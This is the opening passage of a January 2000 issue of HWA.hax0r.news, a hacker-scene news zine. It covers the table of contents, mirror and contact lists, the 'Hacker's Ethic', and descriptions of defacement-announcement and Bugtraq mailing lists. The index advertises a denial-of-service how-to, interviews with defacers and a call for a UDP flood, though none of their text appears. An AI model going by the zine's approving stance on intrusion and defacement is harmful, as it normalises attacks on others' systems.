[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                       <=-[ HWA.hax0r.news ]-=>                         =
==========================================================================
[=HWA 2000=]        Number 49 Volume 2 Issue 1 1999        Jan 2000
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================

Coverage

NEW YEAR EDITION: This is #49 covering Dec 26th to Jan 15th

==========================================================================

HWA 2000 - Happy New Year!

"Providing news archives of recent events into the new millennium..."

==========================================================================
"ABUSUS NON TOLLIT USUM"
==========================================================================

Mailing list members: 20 New members over Xmas, we're now at 496. Can we bump this up somewhat? spread the word!

==========================================================================

Today the spotlight may be on you, some interesting machines that have accessed these archives recently...
Hot Hits

.gov and .mil activity

There are some interesting machines among these, the *.nosc.mil boxes are from SPAWAR information warfare centres, good to see our boys keeping up with the news...
- Ed

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

HWA.hax0r.news

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

Scratch and Sniff Special!

PRINT OUT THIS ISSUE ON YOUR CORPORATE PRINTER OR DADDY'S PRINTER WHEN HE ISN'T LOOKING (IT'S KINDA BIG) OR JUST PRINT THIS SECTION OUT WITH A SCREEN CAPTURE AND SCRATCH THE #'S FOR A GREAT SURPRISE!

##########################################################################
####################################_#####################################
###################################| |####################################
##################################/ __)###################################
##################################\_ \####################################
##################################( /###################################
###################################|_|####################################
##########################################################################
##########################################################################
##########################################################################

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
http://welcome.to/HWA.hax0r.news/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@

The HWA website is sponsored by CUBESOFT communications I highly
recommend you consider these people for your web hosting needs,

Web site sponsored by CUBESOFT networks http://www.csoft.net
check them out for great fast web hosting!

http://www.csoft.net/~hwa

@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

Hacker's Ethic

Sadly, due to the traditional ignorance and sensationalizing of the mass media, the once-noble term hacker has become a pejorative. Among true computer people, being called a hacker is a compliment. One of the traits of the true hacker is a profoundly antibureaucratic and democratic spirit. That spirit is best exemplified by the Hacker's Ethic. This ethic was best formulated by Steven Levy in his 1984 book Hackers: Heroes of the Computer Revolution. Its tenets are as follows:

1 - Access to computers should be unlimited and total.
2 - All information should be free.
3 - Mistrust authority - promote decentralization.
4 - Hackers should be judged by their hacking not bogus criteria such as degrees, age, race, or position.
5 - You create art and beauty on a computer.
6 - Computers can change your life for the better.

The Internet as a whole reflects this ethic.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

A Comment on FORMATTING:

Oct'99 - Started 80 column mode format, code is still left untouched since formatting will destroy syntax.

I received an email recently about the formatting of this newsletter, suggesting that it be formatted to 75 columns. In the past I've endeavoured to format all text to 80 cols except for articles and site statements and urls which are posted verbatim, I've decided to continue with this method unless more people complain, the zine is best viewed in 1024x768 mode with UEDIT.... - Ed

BTW if anyone can suggest a better editor than UEDIT for this thing send me some email i'm finding it lacking in certain areas. Must be able to produce standard ascii.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

Mirrors

New mirror sites

*** http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp *** NEW ***
*** http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
*** http://datatwirl.intranova.net * NEW *
    http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
    http://net-security.org/hwahaxornews
    http://www.sysbreakers.com/hwa
    http://www.attrition.org/hosted/hwa/
    http://www.ducktank.net/hwa/issues.html.
    http://hwazine.cjb.net/
    http://www.hackunlimited.com/files/secu/papers/hwa/
    http://www.attrition.org/~modify/texts/zines/HWA/
  * http://hwa.hax0r.news.8m.com/
  * http://www.fortunecity.com/skyscraper/feature/103/

*   Crappy free sites but they offer 20M & I need the space...
**  Some issues are not located on these sites since they exceed the file size limitations imposed by the sites :-( please only use these if no other recourse is available.
*** Most likely to be up to date other than the main site.

HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net thanks to airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! and p0lix for the (now expired) digitalgeeks archive tnx guys.

http://www.csoft.net/~hwa

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa. *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.projectgamma.com/archives/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so.

It *is* intended however, to complement such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, it's a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle...

@HWA

=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ...
=-----------------------------------------------------------------------=

We could use some more people joining the channel, its usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi...

/join #HWA.hax0r.news on EFnet.

**************************************************************************

"If live is a waste of time and time is a waste of life, then lets all get wasted and have the time of our lives" - kf

Eris Free Net #HWA.hax0r.news

**************************************************************************

/join #HWA.hax0r.news on EFnet the key is `zwen' when keyed

please join to discuss or impart news on the zine and around the scene or just to hang out, we get some interesting visitors you could be one of em.

Note that the channel isn't there to entertain you its purpose is to bring together people interested and involved in the underground to chat about current and recent events etc, do drop in to talk or hangout. Also if you want to promo your site or send in news tips its the place to be, just remember we're not #hack or #chatzone...

**************************************************************************

=--------------------------------------------------------------------------=

Contents

=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=

00.0 .. COPYRIGHTS
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC
00.2 .. SOURCES
00.3 .. THIS IS WHO WE ARE
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?
00.5 .. THE HWA_FAQ V1.0

ABUSUS NON TOLLIT USUM? This is (in case you hadn't guessed) Latin, and loosely translated it means "Just because something is abused, it should not be taken away from those who use it properly". This is our new motto.

=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=

"The three most dangerous things in the world are a programmer with a soldering iron, a hardware type with a program patch and a user with an idea." - Unknown

01.0 .. GREETS
01.1 .. Last minute stuff, rumours, newsbytes
01.2 .. Mailbag
02.0 .. From the Editor
03.0 .. www.2600.com, jokers to the end?
04.0 .. More irc4all proxies
05.0 .. Simple Windows Dos using common tools and UDP
06.0 .. Slash interviews website defacer/cracker Fuqrag
07.0 .. Interview with sSh member YTcracker
08.0 .. Interview with gH member Mosthated
09.0 .. Mosthated/gH advisory Jan 10th 2000
10.0 .. HNN's 1999 Year In Review 12/26/99
11.0 .. 16th CCC Congress opens Monday in Berlin 12/26/99
12.0 .. Canadian Youth Held for Cyber Ransom 12/26/99
13.0 .. Poulsen's List of Gifts to Get a Hacker 12/26/99
14.0 .. More FUD About Cyberterrosists and Y2K 12/26/99
15.0 .. The Datacore Encryption Suite 1.0 Released on Christmas 12/26/99
16.0 .. One Third of UK Vulnerable to Online Attack 12/27/99
17.0 .. Grades Changed at NY School 12/27/99
18.0 .. Cops Wanted, Hackers Need Not Apply 12/27/99
19.0 .. IDS Signature Database Open to the Public 12/27/99
20.0 .. InfoSecurity 1999 Year in Review 12/27/99
21.0 .. Butchered From Inside 7 12/27/99
22.0 .. DVD Industry Sues over 500 Defendants in Anti-Piracy Lawsuit 12/28/99
23.0 .. Web Based CGI Vulnerability Scanner Released 12/28/99
24.0 .. L0pht Interviewed by Slashdot 12/28/99
25.0 .. AirForce to Close Web Sites Over Y2K 12/28/99
26.0 .. Sweden Plans Cyber Defense and Attack Force 12/28/99
27.0 .. DVD Industry Files Lawsuit Over DeCSS 12/29/99
28.0 .. No Evidence of Y2K Viruses or Cyber Terrorist Attack 12/29/99
29.0 .. Pentagon and Others Take Air Force Lead and Shut Down Sites 12/29/99
30.0 .. More from CCC Congress in Germany 12/29/99
31.0 .. Apple Patches OS 9 Security Hole 12/29/99
32.0 .. The need for physical security - Securing the OpenBSD console 12/29/99
33.0 .. New Era: Buffer Overflow Article by evenprime 01/03/00
34.0 .. Gangly Mentality, Y2K hype by ytcracker 01/03/00
35.0 .. "Scene Whores" By Eric Parker/Mind Security 01/03/00
36.0 .. DVD Control Association Looses First Round 01/03/00
37.0 .. First Viruses of the New Year Discovered 01/03/00
38.0 .. Reports from Chaos Computer Congress 01/03/00
39.0 .. Gateway Sells Amiga 01/03/00
40.0 .. CIH Author Hired by Taiwanese Company 01/03/00
41.0 .. Body-Scanners Used by US Customs 01/03/00
42.0 .. Defacements Continue Unabated in the New Year 01/03/00
43.0 .. WebTV Hole Causes Spam 01/04/00
44.0 .. Vandalism or Hactivism? 01/04/00
45.0 .. No Longer Worried About Y2K Feds Look to Security 01/04/00
46.0 .. Interview With Richard Smith 01/04/00
47.0 .. Interview with Adam Penenberg 01/04/00
48.0 .. KISA Discovers Y2K Bug 01/04/00
49.0 .. Sprint Says 'Area 51' Does Exist 01/04/00
50.0 .. Spoofing your HTTP referrer
51.0 .. OSALL removed from the net. 01/13/00
52.0 .. $10,000 USD up for grabs in PSS Storm Chaser 2000 white paper
53.0 .. Bill Gates hands over CEO hat to Steve Ballmer
54.0 .. First Windows 2000 virus found
55.0 .. InterNIC domain name hijacking: "It happens"
56.0 .. "A well known but overlooked threat to Hackers: Themselves"
57.0 .. The complete guide to hax0ring.
58.0 .. FAA Systems Vulnerable Due to Y2K Fixes 01/05/00
59.0 .. Internal Employees Greatest Threat Says New Study 01/05/00
60.0 .. Are the Greatest Risks Internal or External? 01/05/00
61.0 .. Japanese Firms Turn To Security After Y2K 01/05/00
62.0 .. Virus FUD Continues 01/05/00
63.0 .. L0pht Merges With @Stake, Receives Funding 01/06/00
64.0 .. Offensive Cyberwar Capabilities Taking Shape 01/06/00
65.0 .. Army Criticized By Judge On Lack of Security 01/06/00
66.0 .. FAA Responds to Allegations 01/06/00
67.0 .. Electronic Intruder released with Fine and No Jail 01/06/00
68.0 .. PalmCrack 1.0 Released 01/06/00
69.0 .. Radio Pirates (criminals) Steal Police Airwaves 01/06/00
70.0 .. ParseTV has Abruptly Canceled 01/07/00
71.0 .. Finland Authorities Solve Massive Computer Crime Case 01/07/00
72.0 .. The EPA Cracks Down On Security 01/07/00
73.0 .. FBI Still Investigating Y2K Cyber Threats 01/07/00
74.0 .. Clinton Wants Increased Computer Security 01/07/00
75.0 .. Interview with Lloyd's of London and RailTrack Defacer 01/07/00
76.0 .. Pac Bell Hit by Possible Cyber Intruder 01/10/00
77.0 .. Virgin ISP Issues New Passwords 01/10/00
78.0 .. CD Universe Customer Info Compromised 01/10/00
79.0 .. Northwest Notifies Customers of Security Breech 01/10/00
80.0 .. Parse Issues Statement About Cancellation 01/10/00
81.0 .. HACK.CO.ZA DoS attack forces ISP to remove site
82.0 .. Comments on Linux Security 01/10/00
83.0 .. PirateCity.com Wins Domain Battle with FortuneCity.com 01/10/00
84.0 .. Taiwan Claims 1000 Viruses In Arsenal 01/10/00
85.0 .. Reno Announces LawNet 01/11/00
86.0 .. Domains Redirected 01/11/00
87.0 .. Report on SuperComputer Sale to China Released 01/11/00
88.0 .. Kevin Mitnick Interview 01/11/00
89.0 .. Encryption Keys Easily Found On Systems 01/11/00
90.0 .. Buffer Overflow: Reform the AV Industry 01/11/00
91.0 .. China Registering Businesses to Monitor the Net 01/12/00
92.0 .. CD Universe Thief Threatens to Post more CC Numbers 01/12/00
93.0 .. Army Plans on DMZs for Its Networks 01/12/00
94.0 .. CBS Alters On Air Images During News 01/12/00
95.0 .. Direct TV Service Stolen in Illinois 01/12/00
96.0 .. Security Book Released on Net for Free 01/12/00
97.0 .. States Can't Sell Private Info 01/14/00
98.0 .. Mitnick Free Next Friday 01/14/00
99.0 .. Internet Banned From Jewish Homes 01/14/00
100.0 .. NJ Teens Steal CC Numbers 01/14/00
101.0 .. Radius Net takes over Attrition Mirrors 01/14/00
102.0 .. New Ezines Available 01/14/00
103.0 .. FBI to Beef Up CyberCrime Investigation Abilities 01/15/00
104.0 .. UDP Called For Against @Home 01/15/00
105.0 .. ACPM Changes Name and Stops Intrusions 01/15/00
106.0 .. GCHQ Wants a Few Good Cryptographers 01/15/00
107.0 .. Internet Intoxication Used as Defense 01/15/00
108.0 .. Blacksun's Unix Security for Newbies version 1.0, 21/11/99
109.0 .. Where are the exploits and advisories??

=-------------------------------------------------------------------------------=

AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information. Current dates: POSTPONED til further notice, place: TBA.

Ha.Ha .. Humour and puzzles
         Hey You!
         =------=
         Send in humour for this section! I need a laugh and its hard to find good stuff... ;)

SITE.1 .. Featured site,
H.W .. Hacked Websites
A.0 .. APPENDICES
A.1 .. PHACVW linx and references

=--------------------------------------------------------------------------=

@HWA'99, 2000

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD

Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]

HWA/DoK Since 1989

00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks.

Send all goodies to:

    HWA NEWS
    P.O BOX 44118
    370 MAIN ST. NORTH
    BRAMPTON, ONTARIO
    CANADA
    L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof.

Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*

If you still can't think of anything you're probably not that interesting a person after all so don't worry about it

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net

Other methods:

Cruciphux's ICQ:58939315 note; not always online, and do not abuse or use for lame questions!
My Preferred chat method: IRC Efnet in #HWA.hax0r.news

@HWA

00.2 Sources ***
~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed.

News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org

+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ...

http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
win2kbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PLEASE if you have any changes or additions for this section please mail them to cruciphux@dok.org. Thank you.

http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.

http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site
http://www.hack.co.za/ Current exploits archive

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care whether the article/email is to be used in an issue or not and may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box.
- Ed

Mailing List Subscription Info   (Far from complete)   Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~   ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

ATTRITION.ORG's Website defacement mirror and announcement lists
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.attrition.org/mirror/attrition/
http://www.attrition.org/security/lists.html

--

defaced [web page defacement announce list]

This is a public LOW VOLUME (1) mail list to circulate news/info on
defaced web sites. To subscribe to Defaced, send mail to
majordomo@attrition.org with "subscribe defaced" in the BODY of
the mail.

There will be two types of posts to this list:

    1. brief announcements as we learn of a web defacement.
       this will include the site, date, and who signed the
       hack. we will also include a URL of a mirror of the hack.

    2. at the end of the day, a summary will be posted
       of all the hacks of the day. these can be found
       on the mirror site listed under 'relevant links'

This list is for informational purposes only. Subscribing
denotes your acceptance of the following:

    1. we have nothing to do with the hacks. at all.
    2. we are only mirroring the work of OTHER people.
    3. we can not be held liable for anything related
       to these hacks.
    4. all of the points on the disclaimer listed below.

Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.

enjoy.

List maintainer: mcintyre@attrition.org
Hosted by: majordomo@attrition.org

Relevant Links:
    Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
    ATTRITION Mirror: http://www.attrition.org/mirror/

(1) It is low volume on a normal day. On days of many defacements,
    traffic may be increased. On a few days, it is a virtual mail
    flood. You have been warned. ;)

-=-

--

defaced summary [web page defacement announce list]

This is a low traffic mail list to announce all publicly
defaced domains on a given day. To subscribe to Defaced-Summary, send
mail to majordomo@attrition.org with "subscribe defaced-summary" in the
BODY of the mail.

There will be ONE type of post to this list:

    1. a single nightly piece of mail listing all reported
       domains. the same information can be found on
       http://www.attrition.org/mirror/attrition/
       via sporadic updates.

This list is for informational purposes only. Subscribing
denotes your acceptance of the following:

    1. we have nothing to do with the hacks. at all.
    2. we are only mirroring the work of OTHER people.
    3. we can not be held liable for anything related
       to these hacks.
    4. all of the points on the disclaimer listed below.

Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.

enjoy.

List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org

Relevant Links:
    Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
    ATTRITION Mirror: http://www.attrition.org/mirror/

-=-

defaced GM [web page defacement announce list]

This is a low traffic mail list to announce all publicly
defaced government and military domains on a given day. To subscribe to
Defaced-GM, send mail to majordomo@attrition.org with "subscribe
defaced-gm" in the BODY of the mail.

There will be ONE type of post to this list:

    1. sporadic pieces of mail for each government (.gov)
       or military (.mil) system defaced. the same information
       can be found on http://www.attrition.org/mirror/attrition/
       via sporadic updates.

This list is designed primarily for government and military
personnel charged with tracking security incidents on
government run networks.

This list is for informational purposes only. Subscribing
denotes your acceptance of the following:

    1. we have nothing to do with the hacks. at all.
    2. we are only mirroring the work of OTHER people.
    3. we can not be held liable for anything related
       to these hacks.
    4. all of the points on the disclaimer listed below.

Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.

enjoy.

List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org

Relevant Links:
    Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
    ATTRITION Mirror: http://www.attrition.org/mirror/

--

defaced alpha [web page defacement announce list]

This is a low traffic mail list to announce via alpha-numeric
pagers, all publicly defaced government and military domains
on a given day. To subscribe to Defaced-Alpha, send mail to
majordomo@attrition.org with "subscribe defaced-alpha" in
the BODY of the mail.

There will be ONE type of post to this list:

    1. sporadic pieces of mail for each government (.gov)
       or military (.mil) system defaced. the information
       will only include domain names. the same information
       can be found on http://www.attrition.org/mirror/attrition/
       via sporadic updates.

This list is designed primarily for government and military
personnel charged with tracking security incidents on
government run networks. Further, it is designed for
quick response and aimed at law enforcement agencies like
DCIS and the FBI.

To subscribe to this list, a special mail will be sent to YOUR
alpha-numeric pager. A specific response must be made within
12 hours of receiving the mail to be subscribed. If the response
is not received, it is assumed the mail was not sent to your
pager.

This list is for informational purposes only. Subscribing
denotes your acceptance of the following:

    1. we have nothing to do with the hacks. at all.
    2. we are only mirroring the work of OTHER people.
    3. we can not be held liable for anything related
       to these hacks.
    4. all of the points on the disclaimer listed below.

Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.

enjoy.

List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org

Relevant Links:
    Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
    ATTRITION Mirror: http://www.attrition.org/mirror/

-=-

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin. To subscribe to bugtraq, send mail to
listserv@netspace.org containing the message body subscribe bugtraq.
I've been archiving this list on the web since late 1993. It is
searchable with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;

    http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what
they are, how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting
their vulnerabilities. It is about defining, recognizing, and
preventing use of security holes and risks.

Please refrain from posting one-line messages or messages that do not
contain any substance that can relate to this list's charter. I will
allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential
"noise" on this list.
Please follow the below guidelines on what kind of information should be
posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security
  organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector
address if the response does not meet the above criteria.

Remember: YOYOW.

You own your own words. This means that you are responsible for the
words that you post on this list and that reproduction of those words
without your permission in any medium outside the distribution of this
list may be challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I am pleased to inform you of several changes that will be occurring
on June 5th. I hope you find them as exciting as I do.

BUGTRAQ moves to a new home
---------------------------

First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read
below. Other than the change of domains nothing of how the list
is run changes. I am still the moderator. We play by the same rules.

Security Focus will be providing mail archives for BUGTRAQ. The
archives go back longer than Netspace's and are more complete than
Geek-Girl's.

The move will occur one week from today. You will not need to
resubscribe. All your information, including subscription options
will be moved transparently.
Any of you using mail filters (e.g. procmail) to sort incoming
mail into mail folders by examining the From address will have to
update them to include the new address. The new address will be:

    BUGTRAQ@SECURITYFOCUS.COM

Security Focus will also be providing a free searchable vulnerability
database.

BUGTRAQ es muy bueno
--------------------

It has also become apparent that there is a need for forums
